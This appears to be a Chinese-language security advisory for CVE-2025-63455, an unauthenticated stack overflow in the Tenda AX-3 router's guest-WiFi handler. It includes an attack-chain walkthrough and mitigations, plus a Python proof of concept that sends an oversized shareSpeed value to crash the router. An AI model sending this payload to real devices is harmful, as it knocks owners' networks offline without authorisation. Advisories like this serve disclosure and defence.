CVE-2025-63455 Tenda AX-3路由器栈溢出漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-63455

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX-3 v16.03.12.10_CN

漏洞概述

CVE-2025-63455是影响Tenda AX-3路由器v16.03.12.10_CN固件版本的安全漏洞。该漏洞存在于设备的WiFi访客网络配置功能中，具体位于fromSetWifiGusetBasic函数的shareSpeed参数处理逻辑中。攻击者可以通过向该参数注入超长字符串，利用栈溢出技术在受影响设备上触发缓冲区溢出。虽然该漏洞的CVSS评分为7.5（高危级别），但根据CVSS向量的分析，其主要影响集中在可用性方面，攻击成功将导致路由器拒绝服务，使其无法正常处理网络请求。由于该漏洞无需认证即可利用，且可通过网络远程触发，因此具有较高的实际威胁性。攻击者无需任何用户交互或特殊权限，即可通过发送精心构造的HTTP请求来触发该漏洞，对路由器的稳定运行造成严重影响。

技术细节

该漏洞是由于fromSetWifiGusetBasic函数在处理shareSpeed参数时缺乏适当的边界检查导致的栈溢出问题。在Tenda AX-3路由器的Web管理界面中，用户可以配置访客WiFi网络的各种参数，其中包括shareSpeed（共享速度）设置。当用户提交WiFi访客网络配置时，系统会调用fromSetWifiGusetBasic函数来处理这些参数。攻击者可以通过发送HTTP POST请求，在shareSpeed参数中注入超过预期长度的数据。由于函数没有对输入长度进行充分验证，过长的输入数据会超出栈缓冲区的边界，覆盖相邻的栈内存区域。这种栈溢出可能导致程序控制流被劫持或直接崩溃。在CVSS评估中，由于机密性和完整性影响均为无（CN/IN），而可用性影响为高（AH），因此该漏洞被评估为会导致服务中断的拒绝服务漏洞。攻击者只需构造包含超长shareSpeed值的HTTP请求包即可触发漏洞，无需认证或特殊权限。

攻击链分析

STEP 1

1

攻击者识别目标路由器型号为Tenda AX-3，并确认其固件版本为v16.03.12.10_CN

STEP 2

2

攻击者访问路由器的Web管理界面或直接向/goform/fromSetWifiGusetBasic端点发送HTTP POST请求

STEP 3

3

攻击者在shareSpeed参数中注入超长字符串（如500字节以上的字符），构造恶意请求

STEP 4

4

fromSetWifiGusetBasic函数接收超长输入后，由于缺乏边界检查，导致栈缓冲区溢出

STEP 5

5

栈溢出覆盖关键内存区域，可能导致程序崩溃或控制流被劫持

STEP 6

6

路由器服务中断，无法正常处理网络请求，实现拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-63455 PoC - Tenda AX-3 Stack Overflow in fromSetWifiGusetBasic
# Target: Tenda AX-3 router with firmware v16.03.12.10_CN

target_ip = "192.168.0.1"  # Default Tenda router IP
target_url = f"http://{target_ip}/goform/fromSetWifiGusetBasic"

# Generate payload with oversized shareSpeed parameter to trigger stack overflow
# The exact overflow length may vary, using 500+ bytes as demonstration
overflow_length = 500
malicious_payload = "A" * overflow_length

# Construct the exploit request
data = {
    "shareSpeed": malicious_payload,
    # Other parameters may be needed for the function to process the request
    "guestEn": "1",
    "guestSSID": "GuestNetwork",
    "guestAccess": "0"
}

try:
    print(f"[*] Sending exploit request to {target_url}")
    print(f"[*] Payload length: {overflow_length} bytes")
    
    response = requests.post(target_url, data=data, timeout=10)
    
    print(f"[+] Response status: {response.status_code}")
    print(f"[+] Response text: {response.text[:200]}")
    
    # Check if the router is still responsive
    check_url = f"http://{target_ip}/"
    health_check = requests.get(check_url, timeout=5)
    
    if health_check.status_code == 200:
        print("[-] Router appears to be still responsive")
    else:
        print("[+] Router may have crashed or become unresponsive")
        
except requests.exceptions.Timeout:
    print("[+] Exploit likely successful - Router is not responding (DoS)")
except requests.exceptions.ConnectionError:
    print("[+] Exploit likely successful - Cannot connect to router (DoS)")
except Exception as e:
    print(f"[!] Error: {str(e)}")

影响范围

Tenda AX-3 v16.03.12.10_CN

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议采取以下临时缓解措施：1）禁用路由器的WiFi访客网络功能；2）限制对路由器管理界面的访问，仅允许受信任的IP地址访问；3）使用路由器ACL功能阻止来自外部网络的恶意请求；4）监控路由器运行状态，发现异常及时重启恢复服务；5）考虑使用额外的网络边界防护设备过滤异常HTTP请求。